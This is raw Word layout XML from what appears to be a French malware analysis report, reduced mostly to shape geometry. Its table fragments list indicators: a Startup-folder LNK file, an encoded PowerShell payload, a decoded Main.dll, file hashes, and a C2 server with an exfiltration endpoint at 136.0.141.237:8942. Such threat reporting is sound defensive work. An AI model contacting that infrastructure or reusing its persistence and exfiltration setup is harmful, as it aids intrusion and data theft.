            <wp:docPr id="45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3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Fichier LNK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déposé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211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3015245</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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35de98f9e0d48125965d57480e6477118eb0050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313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3110888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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416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3191775</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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502bbdb764166ffa2c1e3a626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5184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3194315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1816677" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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66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Startup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: </w:t>
                        </w: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JJAaLUpqTM.lnk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620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3579760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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9a5b6f96c531eb3521c5c1046d20f9f6fe88614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7232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3585433</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="362609" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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60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8256" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5158739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3587138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1440995" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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9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92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3676038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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030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3756290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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dc51eb2c1c972d947897ac5bd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132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3782083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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235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4303660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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58181a2f73a23e337087d54fa43cd86aea65582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337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4311038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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440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4311038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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542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4480190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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3cc37f1671caf024d8b8c60d7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644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4850395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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26b61a770442f7e2d2f6d1294469eb1a76bbaf0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7472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4856068</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2004894" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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489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849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4946673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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952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5026925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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336c356e3eab7968b70c97988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054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5052718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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156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5574295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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e2715c6abc53d1f46d2bb8855dff8cddc6c7482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25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5581673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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361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5581673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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464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5750825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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81ddf4f0869c3c8bf7108ae56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566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6181748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062998" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Charge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utile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 "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sub-encodée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"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668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6281685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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af5124a73e69670fda2b8cfac1c747c91830b9a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77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6289063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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873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6372490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1017241" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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24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30"/>
                            <w:spacing w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Fn8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0x92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976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6458215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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a5da64d7c06fa231545b4e375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078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6903985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062363" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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3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Powershell (</w:t>
                        </w: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rJ0B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, 93571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180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6989075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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ca304fcff245603ef1329b9230ab91aa4e0edeb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28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6996453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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385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7086623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454681" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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6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octets)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488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7165605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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90b147770e802d9eee69dcbd8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590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7523110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2100357" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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35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Main.dll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décodée depuis </w:t>
                        </w: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Fn8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692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7697735</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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6c416dea922dab579ec4dfaddeb6e1ee4bebed9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795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7705748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="260938" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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9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78976" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6555384</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7705748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113903" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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9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0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7794013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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102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7872995</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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https://136.0.141.237:894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204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7874265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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2aa6dbf8cc38be0e489bbd602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307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8052700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="927071" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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707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2/seqOhyMc/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409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8407030</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2796025" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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6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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://136.0.141.237:8942/seqOhyMc/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512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8414408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1777521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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7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Endpoint d'exfiltration du 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61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8414408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="314862" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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8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71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8767468</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="587258" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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2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Adresse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819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8846450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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136.0.141.237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921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8850218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1517621" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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762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Serveur C2 (port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8942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024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8940823</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="167875" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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8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126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9285870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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65c97f49c32eb9f5281f261e271fe7565f8b0d2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228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9324363</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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331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9462400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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fab59f1bf8638e91e8334b132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433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6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53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6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638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6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740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6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843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6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70150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351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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51155">
                          <a:moveTo>
                            <a:pt x="3670299" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="35115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51155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="35115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596264" y="35115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4144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1342399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="8169275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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8169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8169275">
                          <a:moveTo>
                            <a:pt x="3670299" y="8169275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="8169275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="8169275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="8169275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="8169275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="8169275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="8169275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="8169275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8169275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="7461885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7461885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7461885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="7461885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7461885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7461885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7461885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7461885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7461885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6899275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6899275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6899275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6899275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6899275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6899275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6899275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6899275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6899275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6156325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6156325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6156325"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6156325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6156325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6156325"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6156325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6156325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6156325"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="5268595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5268595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5268595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="5268595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5268595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5268595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5268595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5268595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5268595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4702175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4702175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4702175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4702175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4702175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4702175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4702175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4702175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4702175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4171315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4171315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4171315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4171315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4171315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4171315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4171315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4171315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4171315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="3463925"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3463925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3463925"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="3463925"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3463925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3463925"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3463925"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3463925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3463925"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="2901315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2901315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2901315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="2901315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2901315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2901315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2901315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2901315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2901315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="2334895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2334895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2334895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="2334895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2334895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2334895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2334895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2334895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2334895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1804035"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1804035"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1804035"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1804035"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1804035"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1804035"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1804035"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1804035"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1804035"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1273175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1273175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1273175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1273175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1273175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1273175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1273175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1273175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1273175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="742315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="74231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742315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="742315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="74231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742315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="742315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="74231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7423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44512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351155"/>
